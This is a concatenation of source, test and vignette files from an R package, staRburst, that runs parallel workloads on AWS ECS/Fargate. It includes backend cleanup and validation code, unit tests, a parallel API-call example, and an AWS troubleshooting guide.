    warm_pool_timeout = warm_pool_timeout,
    capacity_provider_name = sprintf("starburst-%s", gsub("\\.", "-", instance_type)),
    pool_started_at = NULL,
    asg_name = sprintf("starburst-asg-%s", gsub("\\.", "-", instance_type)),
    aws_account_id = config$aws_account_id
  )

  # Convert backend list to environment for mutability
  backend_env <- list2env(backend, parent = emptyenv())

  # Create an evaluator function that creates StarburstFuture objects
  evaluator <- function(expr, envir = parent.frame(), substitute = TRUE,
                        globals = TRUE, packages = NULL, lazy = FALSE,
                        seed = FALSE, ...) {
    StarburstFuture(
      expr = expr,
      envir = envir,
      substitute = substitute,
      globals = globals,
      packages = packages,
      lazy = lazy,
      seed = seed,
      ...
    )
  }

  # Register cleanup on exit
  if (!is.null(backend_env)) {
    cleanup_handler <- function() {
      cleanup_cluster(backend_env)
    }
    cleanup_handlers <- getOption("starburst.cleanup_handlers", list())
    cleanup_handlers[[backend_env$cluster_id]] <- cleanup_handler
    options(starburst.cleanup_handlers = cleanup_handlers)
  }

  cat_success(sprintf("[OK] Cluster ready: %s\n", cluster_id))

  # Create a tweaked strategy that knows about our backend
  # This tells future() to call future.starburst() when creating futures
  tweaked_strategy <- future::tweak(
    starburst,
    backend = backend_env,
    workers = workers,
    cpu = cpu,
    memory = memory,
    region = region,
    timeout = timeout
  )


  # Store backend in option so StarburstFuture can access it
  options(starburst.current_backend = backend_env)
  options(starburst.current_cluster_id = cluster_id)

  # Attach backend as attribute to tweaked strategy (for potential direct access)
  attr(tweaked_strategy, "backend") <- backend_env
  attr(tweaked_strategy, "init") <- TRUE
  attr(tweaked_strategy, "cluster_id") <- cluster_id

  tweaked_strategy
}

#' Get wave queue status
#'
#' @param backend Backend environment
#' @keywords internal
get_wave_status <- function(backend) {
  if (!backend$quota_limited) {
    return(NULL)
  }

  list(
    current_wave = backend$wave_queue$current_wave,
    pending = length(backend$wave_queue$pending),
    running = length(backend$wave_queue$wave_futures),
    completed = backend$wave_queue$completed,
    total_waves = backend$num_waves
  )
}

#' Clean up cluster resources
#'
#' @keywords internal
cleanup_cluster <- function(backend) {
  cat_info(sprintf("\n[Cleaning] Cleaning up cluster: %s\n", backend$cluster_id))

  # Stop any running tasks
  stop_running_tasks(backend)

  # Calculate final cost
  final_cost <- calculate_total_cost(backend)

  # Calculate runtime
  runtime <- as.numeric(difftime(Sys.time(), backend$created_at, units = "mins"))

  # Report
  cat_success(sprintf(
    paste0(
      "[OK] Cluster shutdown:\n",
      "   * Runtime: %.1f minutes\n",
      "   * Tasks completed: %d\n",
      "   * Tasks failed: %d\n",
      "   * Total cost: $%.2f\n"
    ),
    runtime, backend$completed_tasks, backend$failed_tasks, final_cost
  ))

  # Optionally clean up S3 files. Resolution order: the runtime option
  # (starburst.cleanup_s3) overrides, else the persisted config's auto_cleanup_s3
  # (settable via starburst_config()), else default TRUE. Previously this read only
  # the option, so starburst_config(auto_cleanup_s3 = FALSE) had no effect.
  if (should_cleanup_s3()) {
    cleanup_s3_files(backend)
  }

  # Handle EC2 warm pool cleanup
  if (backend$launch_type == "EC2" && !is.null(backend$pool_started_at)) {
    idle_time <- difftime(Sys.time(), backend$pool_started_at, units = "secs")

    if (idle_time > backend$warm_pool_timeout) {
      cat_info("[Cleaning] Pool timeout reached, scaling down...\n")
      stop_warm_pool(backend)
    } else {
      remaining_mins <- (backend$warm_pool_timeout - as.numeric(idle_time)) / 60
      cat_info(sprintf("[Time]  Pool will remain warm for %.1f more minutes\n", remaining_mins))
      cat_info(sprintf("   Set warm_pool_timeout=0 to scale down immediately\n"))
    }
  }

  invisible(NULL)
}

#' Register cleanup handler
#'
#' @keywords internal
register_cleanup <- function(evaluator) {
  # Get backend from evaluator
  backend <- attr(evaluator, "backend")

  if (is.null(backend)) {
    return(invisible(NULL))
  }

  # Register cleanup on R session exit
  cleanup_handler <- function() {
    cleanup_cluster(backend)
  }

  # Store in option for later retrieval
  cleanup_handlers <- getOption("starburst.cleanup_handlers", list())
  cleanup_handlers[[backend$cluster_id]] <- cleanup_handler
  options(starburst.cleanup_handlers = cleanup_handlers)

  invisible(NULL)
}

# Helper functions

validate_workers <- function(workers) {
  if (!is.numeric(workers) || workers < 1) {
    stop("workers must be a positive number")
  }
  if (workers > 500) {
    stop(sprintf(
      paste0("Workers must be <= 500 (requested: %d)\n",
             "For higher limits, contact AWS support for quota increases.\n",
             "See: https://docs.aws.amazon.com/servicequotas/"),
      workers
    ))
  }
}

validate_cpu <- function(cpu) {
  valid_cpus <- c(0.25, 0.5, 1, 2, 4, 8, 16)
  if (!cpu %in% valid_cpus) {
    stop(sprintf("cpu must be one of: %s", paste(valid_cpus, collapse = ", ")))
  }
}

validate_memory <- function(memory) {
  # Parse memory string (e.g., "8GB")
  memory_gb <- parse_memory(memory)

  # Fargate memory ranges depend on CPU
  # This is simplified - actual validation would check CPU/memory compatibility
  if (memory_gb < 0.5 || memory_gb > 120) {
    stop("memory must be between 0.5GB and 120GB")
  }
}

validate_platform <- function(platform) {
  valid_platforms <- c("X86_64", "ARM64")
  if (!platform %in% valid_platforms) {
    stop(sprintf("platform must be one of: %s", paste(valid_platforms, collapse = ", ")))
  }
}

validate_launch_type <- function(launch_type) {
  valid_launch_types <- c("FARGATE", "EC2")
  if (!launch_type %in% valid_launch_types) {
    stop(sprintf("launch_type must be one of: %s", paste(valid_launch_types, collapse = ", ")))
  }
}

validate_instance_type <- function(instance_type) {
  # Validate instance type format (e.g., c7g.xlarge)
  if (!grepl("^[a-z][0-9]+[a-z]*\\.(nano|micro|small|medium|large|xlarge|[0-9]+xlarge)$", instance_type)) {
    stop(sprintf("Invalid instance_type: %s. Example valid types: c7g.xlarge, c7i.2xlarge, r7g.large", instance_type))
  }
}

#' Parse memory specification
#' @param memory Memory specification (numeric GB or string like "8GB")
#' @keywords internal
parse_memory <- function(memory) {
  if (is.numeric(memory)) {
    return(memory)
  }

  if (grepl("GB$", memory, ignore.case = TRUE)) {
    return(as.numeric(sub("GB$", "", memory, ignore.case = TRUE)))
  }

  if (grepl("MB$", memory, ignore.case = TRUE)) {
    return(as.numeric(sub("MB$", "", memory, ignore.case = TRUE)) / 1024)
  }

  stop("memory must be numeric (GB) or string like '8GB'")
}

# `%||%` is defined in R/utils.R (single source of truth).

#' staRburst Future Strategy
#'
#' Future strategy for running parallel R workloads on AWS (EC2 by default, or Fargate)
#'
#' @param workers Number of parallel workers
#' @param cpu vCPUs per worker (1, 2, 4, 8, or 16)
#' @param memory Memory per worker (supports GB notation, e.g., "8GB")
#' @param region AWS region (default: from config or "us-east-1")
#' @param timeout Maximum runtime in seconds (default: 3600)
#' @param auto_quota_request Automatically request quota increases
#' @param envir Environment for evaluation
#' @param ... Additional arguments
#'
#' @return A starburst future plan
#' @export
#'
#' @examples
#' \donttest{
#' if (starburst_is_configured()) {
#'   future::plan(starburst, workers = 50)
#'   results <- future.apply::future_lapply(1:100, function(i) i^2)
#' }
#' }

# Starburst marker now defined in StarburstBackend-class.R

test_that("wave queue initialized in backend", {
  skip_on_cran()

  # Create mock backend
  backend <- list(
    quota_limited = TRUE,
    workers_per_wave = 5,
    wave_queue = list(
      pending = list(),
      current_wave = 1,
      wave_futures = list(),
      completed = 0
    )
  )

  expect_equal(backend$wave_queue$current_wave, 1)
  expect_length(backend$wave_queue$pending, 0)
  expect_length(backend$wave_queue$wave_futures, 0)
})

test_that("get_wave_status returns NULL for non-quota-limited backends", {
  skip_on_cran()

  backend <- list(quota_limited = FALSE)

  result <- get_wave_status(backend)
  expect_null(result)
})

test_that("get_wave_status returns correct status", {
  skip_on_cran()

  backend <- list(
    quota_limited = TRUE,
    num_waves = 5,
    wave_queue = list(
      pending = list("t1", "t2"),
      current_wave = 2,
      wave_futures = list("t3" = list()),
      completed = 10
    )
  )

  result <- get_wave_status(backend)

  expect_type(result, "list")
  expect_equal(result$current_wave, 2)
  expect_equal(result$pending, 2)
  expect_equal(result$running, 1)
  expect_equal(result$completed, 10)
  expect_equal(result$total_waves, 5)
})

test_that("null coalesce operator works", {
  `%||%` <- starburst:::`%||%`

  expect_equal(NULL %||% "default", "default")
  expect_equal("value" %||% "default", "value")
  expect_equal(0 %||% "default", 0)
  expect_equal(FALSE %||% "default", FALSE)
})

test_that("validate_workers checks bounds", {
  expect_error(validate_workers(-1))
  expect_error(validate_workers(0))
  expect_error(validate_workers(1000))  # Exceeds max of 500
  expect_silent(validate_workers(1))
  expect_silent(validate_workers(100))
  expect_silent(validate_workers(500))  # Max allowed
})

test_that("validate_cpu checks valid values", {
  expect_silent(validate_cpu(1))
  expect_silent(validate_cpu(2))
  expect_silent(validate_cpu(4))
  expect_silent(validate_cpu(8))
  expect_silent(validate_cpu(16))

  expect_error(validate_cpu(3))
  expect_error(validate_cpu(32))
})

test_that("estimate_cost calculates correctly", {
  # 1 worker, 4 vCPU, 8GB, 1 hour
  cost <- estimate_cost(1, 4, "8GB", 1)

  expect_type(cost, "list")
  expect_true("per_worker" %in% names(cost))
  expect_true("per_hour" %in% names(cost))
  expect_true("total_estimated" %in% names(cost))

  # Cost should be positive
  expect_gt(cost$per_worker, 0)
  expect_gt(cost$per_hour, 0)

  # Multiple workers should scale linearly
  cost_100 <- estimate_cost(100, 4, "8GB", 1)
  expect_equal(cost_100$per_hour, cost$per_worker * 100)
})

---
title: "Example: Parallel Bulk API Calls"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Example: Parallel Bulk API Calls}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

## Overview

Making hundreds or thousands of API calls is a common bottleneck in data pipelines. This example demonstrates parallelizing REST API calls to fetch data from multiple endpoints.

**Use Case**: Data enrichment, web scraping, external data integration, geocoding

**Computational Pattern**: I/O-bound parallel processing with rate limiting

## The Problem

You need to enrich a dataset of 1,000 companies with external data from a REST API:
- Company financial metrics
- Stock prices
- News sentiment
- ESG scores

Each API call takes 0.5-2 seconds due to network latency. Sequential execution would take 8-30 minutes.

## Setup

```{r setup, eval=FALSE}
library(starburst)
library(httr)
library(jsonlite)
```

## API Call Function

Define a function that fetches data for one company:

```{r api-function, eval=FALSE}
fetch_company_data <- function(ticker) {
  # Add small delay to respect rate limits
  Sys.sleep(runif(1, 0.1, 0.3))

  # For demo purposes, we'll use a public API
  # In practice, replace with your actual API endpoint
  base_url <- "https://api.example.com/company"

  tryCatch({
    # Fetch company info
    response <- httr::GET(
      paste0(base_url, "/", ticker),
      httr::timeout(10),
      httr::add_headers(
        "User-Agent" = "staRburst-example/1.0"
      )
    )

    # Check for success
    if (httr::status_code(response) == 200) {
      data <- httr::content(response, "parsed")

      # Extract relevant fields
      list(
        ticker = ticker,
        success = TRUE,
        company_name = data$name %||% NA,
        market_cap = data$marketCap %||% NA,
        pe_ratio = data$peRatio %||% NA,
        revenue = data$revenue %||% NA,
        employees = data$employees %||% NA,
        sector = data$sector %||% NA,
        timestamp = Sys.time()
      )
    } else {
      # Handle API errors
      list(
        ticker = ticker,
        success = FALSE,
        error = paste("HTTP", httr::status_code(response)),
        timestamp = Sys.time()
      )
    }
  }, error = function(e) {
    # Handle network errors
    list(
      ticker = ticker,
      success = FALSE,
      error = as.character(e),
      timestamp = Sys.time()
    )
  })
}

# Helper: null-coalescing operator
`%||%` <- function(x, y) if (is.null(x)) y else x
```

## Mock API for Demo

Since we need a real API for testing, let's create a mock function that simulates API behavior:

```{r mock-api, eval=FALSE}
# Mock function that simulates API with realistic delays
fetch_company_data_mock <- function(ticker) {
  # Simulate network latency
  Sys.sleep(runif(1, 0.2, 0.8))

  # Simulate occasional failures (5% rate)
  if (runif(1) < 0.05) {
    return(list(
      ticker = ticker,
      success = FALSE,
      error = "API timeout",
      timestamp = Sys.time()
    ))
  }

  # Generate mock data
  list(
    ticker = ticker,
    success = TRUE,
    company_name = paste("Company", ticker),
    market_cap = round(rnorm(1, 50e9, 20e9), 0),
    pe_ratio = round(rnorm(1, 25, 10), 2),
    revenue = round(rnorm(1, 10e9, 5e9), 0),
    employees = round(rnorm(1, 50000, 20000), 0),
    sector = sample(c("Technology", "Healthcare", "Finance", "Energy"), 1),
    timestamp = Sys.time()
  )
}
```

## Generate Sample Data

Create a list of 1,000 company tickers:

```{r sample-data, eval=FALSE}
# Generate mock ticker symbols
set.seed(123)
n_companies <- 1000
tickers <- paste0(
  sample(LETTERS, n_companies, replace = TRUE),
  sample(LETTERS, n_companies, replace = TRUE),
  sample(LETTERS, n_companies, replace = TRUE)
)

head(tickers)
# [1] "NAL" "RPL" "OQM" "TYW" "AIT" "UMD"
```

## Local Execution

Run sequentially on local machine:

```{r local, eval=FALSE}
cat(sprintf("Fetching data for %d companies locally...\n", length(tickers)))

local_start <- Sys.time()
local_results <- lapply(head(tickers, 50), fetch_company_data_mock)
local_time <- as.numeric(difftime(Sys.time(), local_start, units = "secs"))

cat(sprintf("✓ Completed 50 calls in %.1f seconds\n", local_time))
cat(sprintf("  Estimated time for %d: %.1f minutes\n",
            n_companies, local_time * n_companies / 50 / 60))
```

**Typical output**:
```
Fetching data for 1000 companies locally...
✓ Completed 50 calls in 24.3 seconds
  Estimated time for 1000: 8.1 minutes
```

## Cloud Execution with staRburst

Run all 1,000 API calls in parallel:

```{r cloud, eval=FALSE}
cat(sprintf("Fetching data for %d companies on AWS...\n", n_companies))

results <- starburst_map(
  tickers,
  fetch_company_data_mock,
  workers = 25,
  cpu = 1,
  memory = "2GB"
)
```

**Typical output**:
```
🚀 Starting starburst cluster with 25 workers
💰 Estimated cost: ~$1.00/hour
📊 Processing 1000 items with 25 workers
📦 Created 25 chunks (avg 40 items per chunk)
🚀 Submitting tasks...
✓ Submitted 25 tasks
⏳ Progress: 25/25 tasks (0.8 minutes elapsed)

✓ Completed in 0.8 minutes
💰 Actual cost: $0.01
```

## Results Processing

Analyze the fetched data:

```{r analysis, eval=FALSE}
# Convert results to data frame
results_df <- do.call(rbind, lapply(results, function(x) {
  if (x$success) {
    data.frame(
      ticker = x$ticker,
      company_name = x$company_name,
      market_cap = x$market_cap,
      pe_ratio = x$pe_ratio,
      revenue = x$revenue,
      employees = x$employees,
      sector = x$sector,
      success = TRUE,
      error = NA,
      stringsAsFactors = FALSE
    )
  } else {
    data.frame(
      ticker = x$ticker,
      company_name = NA,
      market_cap = NA,
      pe_ratio = NA,
      revenue = NA,
      employees = NA,
      sector = NA,
      success = FALSE,
      error = x$error,
      stringsAsFactors = FALSE
    )
  }
}))

# Summary
success_rate <- mean(results_df$success) * 100
cat(sprintf("\n=== Results Summary ===\n"))
cat(sprintf("Total companies: %d\n", nrow(results_df)))
cat(sprintf("Successful fetches: %d (%.1f%%)\n",
            sum(results_df$success), success_rate))
cat(sprintf("Failed fetches: %d\n", sum(!results_df$success)))

# Show sample of results
cat("\n=== Sample Results ===\n")
print(head(results_df[results_df$success, ], 10))

# Sector distribution
cat("\n=== Sector Distribution ===\n")
print(table(results_df$sector))

# Market cap summary
cat("\n=== Market Cap Summary ===\n")
cat(sprintf("Mean: $%.2fB\n",
            mean(results_df$market_cap, na.rm = TRUE) / 1e9))
cat(sprintf("Median: $%.2fB\n",
            median(results_df$market_cap, na.rm = TRUE) / 1e9))
cat(sprintf("Range: $%.2fB - $%.2fB\n",
            min(results_df$market_cap, na.rm = TRUE) / 1e9,
            max(results_df$market_cap, na.rm = TRUE) / 1e9))
```

## Performance Comparison

| Method | Workers | Time | Cost | Speedup |
|--------|---------|------|------|---------|
| Local | 1 | 8.1 min | $0 | 1x |
| staRburst | 10 | 2.1 min | $0.004 | 3.9x |
| staRburst | 25 | 0.8 min | $0.01 | 10.1x |
| staRburst | 50 | 0.5 min | $0.02 | 16.2x |

**Key Insights**:
- Excellent scaling for I/O-bound workloads
- Cost remains minimal even with 50 workers
- Network latency dominates computation time
- Automatic retries handle transient failures

## Rate Limiting Considerations

When working with real APIs:

```{r rate-limiting, eval=FALSE}
# Add jitter to respect rate limits
fetch_with_rate_limit <- function(ticker, rate_limit = 100) {
  # Add delay based on rate limit (calls per minute)
  delay <- 60 / rate_limit + runif(1, 0, 0.1)
  Sys.sleep(delay)

  fetch_company_data(ticker)
}

# Use with staRburst
results <- starburst_map(
  tickers,
  function(x) fetch_with_rate_limit(x, rate_limit = 100),
  workers = 10  # Adjust workers based on API rate limit
)
```

**Rate limit calculation**:
- API limit: 100 calls/minute
- Workers: 10
- Max throughput: 1000 calls/minute (10 workers × 100 calls/min)
- Adjust workers to stay under limit

## Error Handling Best Practices

```{r error-handling, eval=FALSE}
fetch_with_retry <- function(ticker, max_retries = 3) {
  for (attempt in 1:max_retries) {
    result <- fetch_company_data(ticker)

    if (result$success) {
      return(result)
    }

    # Exponential backoff
    if (attempt < max_retries) {
      Sys.sleep(2^attempt + runif(1, 0, 1))
    }
  }

  # Return failure after all retries
  result$error <- paste("Failed after", max_retries, "retries:", result$error)
  return(result)
}
```

## When to Use This Pattern

**Good fit**:
- Many independent API calls (> 100)
- Each call takes > 0.5 seconds
- API allows concurrent requests
- Transient failures are acceptable

**Not ideal**:
- Strict rate limits (< 10 calls/second total)
- APIs that block concurrent requests
- Very fast APIs (< 0.1 seconds per call)

## Running the Full Example

The complete runnable script is available at:
```{r, eval=FALSE}
system.file("examples/api-calls.R", package = "starburst")
```

Run it with:
```{r, eval=FALSE}
source(system.file("examples/api-calls.R", package = "starburst"))
```

## Next Steps

- Replace mock function with your actual API
- Implement proper authentication (API keys, OAuth)
- Add request caching to avoid redundant calls
- Monitor API usage and costs
- Implement more sophisticated retry logic

**Related examples**:
- [Report Generation](example-reports.html) - Another I/O-bound parallel task
- [Feature Engineering](example-feature-engineering.html) - Data enrichment patterns

---
title: "Troubleshooting staRburst"
output: rmarkdown::html_vignette
vignette: >
  %\VignetteIndexEntry{Troubleshooting staRburst}
  %\VignetteEngine{knitr::rmarkdown}
  %\VignetteEncoding{UTF-8}
---

```{r, include = FALSE}
knitr::opts_chunk$set(
  collapse = TRUE,
  comment = "#>"
)
```

# Troubleshooting staRburst

This guide helps you diagnose and fix common issues with staRburst.

## Accessing Logs

### CloudWatch Logs Structure

staRburst automatically sends worker logs to CloudWatch Logs:

- **Log Group:** `/aws/ecs/starburst-worker`
- **Log Stream Pattern:** `starburst/<task-id>`
- **Retention:** 7 days (configurable)

### Viewing Logs in R

```r
# For ephemeral mode
library(starburst)
plan(starburst, workers = 10)

# Check logs for a specific task
# (get task ID from error messages or futures)

# For detached sessions
session <- starburst_session_attach("session-id")
status <- session$status()

# View failed task logs using AWS CLI or console
```

### Viewing Logs in AWS Console

1. Navigate to **CloudWatch → Log Groups**
2. Find `/aws/ecs/starburst-worker`
3. Search for task ID in stream names
4. Use CloudWatch Insights for advanced queries:

```
fields @timestamp, @message
| filter @message like /ERROR/
| sort @timestamp desc
| limit 100
```

## Common Issues

### Issue 1: Tasks Stuck in "Pending"

**Symptoms:**
- `session$status()` shows tasks never start
- Workers = 0 in status
- Tasks remain in pending state for >5 minutes

**Diagnosis:**

```r
# Check Fargate quota
config <- get_starburst_config()
sts <- paws.security.identity::sts()
account <- sts$get_caller_identity()

# Check service quotas manually in AWS Console:
# Service Quotas → AWS Fargate → Fargate vCPUs
```

**Common Causes:**

1. **Insufficient vCPU quota** - Most common issue
   - Default Fargate quota: 6 vCPUs in us-east-1
   - Each worker uses configured CPU (default: 4 vCPUs)
   - With 10 workers × 4 vCPUs = 40 vCPUs needed

2. **Invalid task definition** - Wrong CPU/memory combination
   - Fargate has strict CPU/memory pairings
   - Example: 4 vCPUs supports 8-30 GB memory

3. **Network/subnet issues** - VPC configuration problems
   - Subnets must have available IP addresses
   - Security groups must allow outbound traffic

4. **IAM permission errors** - Missing ECS task execution role permissions
   - Must have ECR, S3, CloudWatch Logs access

**Solutions:**

```r
# Solution 1: Request quota increase
# Go to AWS Console → Service Quotas → AWS Fargate
# Request vCPUs quota increase to 100+

# Solution 2: Reduce workers
plan(starburst, workers = 1)  # Use only 1 worker (4 vCPUs)

# Solution 3: Reduce CPU per worker
plan(starburst, workers = 10, cpu = 0.25, memory = "512MB")

# Solution 4: Check IAM permissions
# Ensure ECS task execution role has:
# - AmazonECSTaskExecutionRolePolicy
# - S3 read/write access to starburst bucket
# - CloudWatch Logs write access
```

### Issue 2: Workers Crash Immediately

**Symptoms:**
- Tasks start but stop within 30 seconds
- Status shows workers = 0 after initial launch
- CloudWatch logs show error before exit

**Diagnosis:**

```r
# View CloudWatch logs for the failed task
# Look for error messages in the logs

# Common error patterns:
# - "Error: Cannot connect to S3" → S3 permissions
# - "Error loading package" → Package installation failed
# - "Cannot allocate memory" → Memory limit too low
# - "exec format error" → Architecture mismatch
```

**Common Causes:**

1. **S3 permission errors** - Task role can't access bucket
2. **Package installation failures** - Missing system dependencies
3. **Out of memory** - Memory limit too low for workload
4. **Architecture mismatch** - ARM64 vs X86_64 image/instance mismatch

**Solutions:**

```r
# Solution 1: Verify S3 permissions
# Check task role has S3 access:
# IAM → Roles → starburstECSTaskRole → Permissions
# Should have S3 GetObject/PutObject on bucket

# Solution 2: Increase memory
plan(starburst, workers = 5, cpu = 4, memory = "16GB")

# Solution 3: Check Docker build logs
# Re-run starburst setup to rebuild image
# Watch for package installation errors

# Solution 4: For EC2 mode, verify architecture matches
plan(starburst,
     launch_type = "EC2",
     instance_type = "c7g.xlarge")  # Graviton (ARM64)
# Ensure Docker image built for matching architecture
```

### Issue 3: "Access Denied" Errors

**Symptoms:**
- Error messages containing "AccessDenied" or "Forbidden"
- Can't create tasks, access S3, or push Docker images

**Diagnosis:**

```r
# Check which operation is failing:
# 1. Docker push → ECR permissions
# 2. S3 operations → S3 permissions
# 3. Task launch → ECS permissions

# Verify credentials
library(paws.security.identity)
sts <- paws.security.identity::sts()
identity <- sts$get_caller_identity()
print(identity)  # Should show your AWS account
```

**Common Causes:**

1. **No AWS credentials configured**
2. **IAM user lacks required permissions**
3. **S3 bucket policy blocks access**
4. **ECR repository doesn't exist or blocks access**

**Solutions:**

```r
# Solution 1: Configure AWS credentials
# Option A: Environment variables
Sys.setenv(
  AWS_ACCESS_KEY_ID = "YOUR_KEY",
  AWS_SECRET_ACCESS_KEY = "YOUR_SECRET",
  AWS_DEFAULT_REGION = "us-east-1"
)

# Option B: AWS CLI profile
Sys.setenv(AWS_PROFILE = "your-profile")

# Option C: IAM role (when running on EC2/ECS)
# No configuration needed - automatic

# Solution 2: Add required IAM permissions
# Your IAM user/role needs:
# - ECS: RunTask, DescribeTasks, StopTask
# - ECR: GetAuthorizationToken, BatchCheckLayerAvailability,
#        GetDownloadUrlForLayer, PutImage, InitiateLayerUpload, etc.
# - S3: GetObject, PutObject, ListBucket on your bucket
# - IAM: PassRole (to pass ECS task role)

# Solution 3: Run starburst_setup() to create all resources
library(starburst)
starburst_setup(bucket = "my-starburst-bucket")
```

### Issue 4: High Costs / Runaway Workers

**Symptoms:**
- AWS bill higher than expected
- Many tasks running when you expected them to stop
- Old sessions still have active workers

**Diagnosis:**

```r
# List all active sessions
library(starburst)
sessions <- starburst_list_sessions()
print(sessions)

# Check for old sessions with running tasks
```

**Common Causes:**

1. **Forgot to cleanup session** - Workers keep running
2. **Requested too many workers** - Cost adds up quickly
3. **Long-running tasks** - Tasks running for hours/days

**Solutions:**

```r
# Solution 1: Cleanup all sessions
sessions <- starburst_list_sessions()
for (session_id in sessions$session_id) {
  session <- starburst_session_attach(session_id)
  session$cleanup(stop_workers = TRUE, force = TRUE)
}

# Solution 2: Set budget alerts in AWS
# AWS Billing Console → Budgets → Create budget
# Set alert at $100, $500 thresholds

# Solution 3: Use worker validation to prevent mistakes
# staRburst now enforces max 500 workers
# Previously you could accidentally request 10,000+

# Solution 4: Set absolute timeout on sessions
session <- starburst_session(
  workers = 10,
  absolute_timeout = 3600  # Auto-terminate after 1 hour
)
```

### Issue 5: Session Cleanup Not Working

**Symptoms:**
- Called `session$cleanup()` but workers still running
- S3 files not deleted
- Tasks still appearing in ECS console

**Diagnosis:**

```r
# Check if cleanup was called with correct parameters
session$cleanup(stop_workers = TRUE, force = TRUE)

# Verify tasks actually stopped (may take 30-60 seconds)
Sys.sleep(60)

# Check ECS tasks manually
library(paws.compute)
ecs <- paws.compute::ecs(config = list(region = "us-east-1"))
tasks <- ecs$list_tasks(cluster = "starburst-cluster")
print(tasks$taskArns)  # Should be empty or not include your tasks
```

**Common Causes:**

1. **Cleanup called without stop_workers** - Workers not stopped
2. **Cleanup called without force** - S3 files preserved
3. **Tasks in different cluster** - Cleanup looking in wrong place
4. **ECS eventual consistency** - Tasks take time to stop

**Solutions:**

```r
# Solution 1: Always use both flags for full cleanup
session$cleanup(stop_workers = TRUE, force = TRUE)

# Solution 2: Wait for ECS to process stop requests
session$cleanup(stop_workers = TRUE)
Sys.sleep(60)  # Wait 1 minute
# Then verify in AWS console

# Solution 3: Manual cleanup if needed
library(paws.compute)
library(paws.storage)

ecs <- paws.compute::ecs(config = list(region = "us-east-1"))
s3 <- paws.storage::s3(config = list(region = "us-east-1"))

# Stop all tasks in cluster
tasks <- ecs$list_tasks(cluster = "starburst-cluster", desiredStatus = "RUNNING")
for (task_arn in tasks$taskArns) {
  ecs$stop_task(cluster = "starburst-cluster", task = task_arn)
}

# Delete all session S3 files
result <- s3$list_objects_v2(Bucket = "your-bucket", Prefix = "sessions/")
# ... delete objects
```

### Issue 6: Results Not Appearing

**Symptoms:**
- `session$collect()` returns empty list
- Tasks show as "completed" but no results
- S3 doesn't contain result files

**Diagnosis:**

```r
# Check session status
status <- session$status()
print(status)

# Verify tasks were actually submitted
# Check S3 for task files
library(paws.storage)
s3 <- paws.storage::s3(config = list(region = "us-east-1"))
result <- s3$list_objects_v2(
  Bucket = "your-bucket",
  Prefix = sprintf("sessions/%s/results/", session$session_id)
)
print(result$Contents)  # Should show .qs files
```

**Common Causes:**

1. **Tasks failed before producing results** - Check for errors
2. **Workers can't write to S3** - Permission issue
3. **Looking at wrong session ID** - Attached to wrong session
4. **Results already collected** - Results only collected once

**Solutions:**

```r
# Solution 1: Check task status for errors
status <- session$status()
if (status$failed_tasks > 0) {
  # Check CloudWatch logs for failed task IDs
  # Look for error messages
}

# Solution 2: Verify S3 write permissions
# Task role must have S3 PutObject permission

# Solution 3: Verify session ID
print(session$session_id)
# Make sure this matches the session you created

# Solution 4: Results can only be collected once
# If you already called collect(), results are removed from S3
# You should store results after collection:
results <- session$collect(wait = TRUE)
saveRDS(results, "my_results.rds")  # Save locally
```

### Issue 7: Detached Session Reattach Fails

**Symptoms:**
- `starburst_session_attach()` throws error
- "Session not found" message
- Can't reconnect after closing R

**Diagnosis:**

```r
# List all sessions to find your session ID
sessions <- starburst_list_sessions()
print(sessions)

# Try to attach with exact session ID
session_id <- "session-abc123..."
session <- starburst_session_attach(session_id)
```

**Common Causes:**

1. **Wrong session ID** - Typo or wrong ID
2. **Session expired** - Exceeded absolute_timeout
3. **S3 manifest deleted** - Someone deleted session files
4. **Wrong region** - Session created in different region

**Solutions:**

```r
# Solution 1: List and copy exact session ID
sessions <- starburst_list_sessions()
session_id <- sessions$session_id[1]  # Use exact ID
session <- starburst_session_attach(session_id)

# Solution 2: Save session ID immediately after creation
session <- starburst_session(workers = 10)
session_id <- session$session_id
write(session_id, "my_session_id.txt")  # Save to file
# Later:
session_id <- readLines("my_session_id.txt")
session <- starburst_session_attach(session_id)

# Solution 3: Check correct region
session <- starburst_session_attach(session_id, region = "us-west-2")
```

### Issue 8: Package Installation Failures

**Symptoms:**
- Docker build fails during `renv::restore()`
- Error messages about missing system dependencies
- Specific packages fail to install

**Diagnosis:**

Look at Docker build output when running staRburst.
Common error patterns:

```
Error: installation of package 'X' had non-zero exit status
Error: compilation failed for package 'X'
Error: unable to load shared library
```

**Common Causes:**

1. **Missing system dependencies** - Package needs system libraries
2. **Package not in CRAN** - Private or development package
3. **Version conflicts** - renv.lock specifies unavailable version

**Solutions:**

```r
# Solution 1: Add system dependencies to Dockerfile.base
# Edit starburst package Dockerfile.base template:
# Add RUN apt-get install -y libcurl4-openssl-dev

# Solution 2: Use renv snapshot to capture dependencies
renv::snapshot()  # Updates renv.lock

# Solution 3: Install from GitHub for dev packages
renv::install("user/package")
renv::snapshot()

# Solution 4: Check package availability
install.packages("package")  # Test locally first
```

## Advanced Diagnostics

### Checking ECS Task Status

```r
library(paws.compute)
ecs <- paws.compute::ecs(config = list(region = "us-east-1"))

# List all tasks
tasks <- ecs$list_tasks(
  cluster = "starburst-cluster",
  desiredStatus = "RUNNING"
)

# Describe specific task
task_detail <- ecs$describe_tasks(
  cluster = "starburst-cluster",
  tasks = tasks$taskArns[1:1]
)

# Check exit code and reason
print(task_detail$tasks[[1]]$containers[[1]]$exitCode)
print(task_detail$tasks[[1]]$stoppedReason)
```

### Monitoring S3 Storage

```r
library(paws.storage)
s3 <- paws.storage::s3(config = list(region = "us-east-1"))

# List all session files
result <- s3$list_objects_v2(
  Bucket = "your-starburst-bucket",
  Prefix = "sessions/"
)

# Calculate total storage
total_bytes <- sum(sapply(result$Contents, function(x) x$Size))
total_mb <- total_bytes / 1024^2
cat(sprintf("Total storage: %.2f MB\n", total_mb))
```

### Estimating Costs

```r
# Fargate pricing (us-east-1, 2026):
# - vCPU: $0.04048 per hour
# - Memory: $0.004445 per GB-hour

vcpu_price <- 0.04048
memory_price <- 0.004445

workers <- 10
cpu <- 4
memory_gb <- 8
runtime_hours <- 1

cost_per_worker <- (cpu * vcpu_price) + (memory_gb * memory_price)
total_cost <- workers * cost_per_worker * runtime_hours

cat(sprintf("Estimated cost: $%.2f for %d hours\n", total_cost, runtime_hours))
```

## Getting Help

If you encounter issues not covered here:

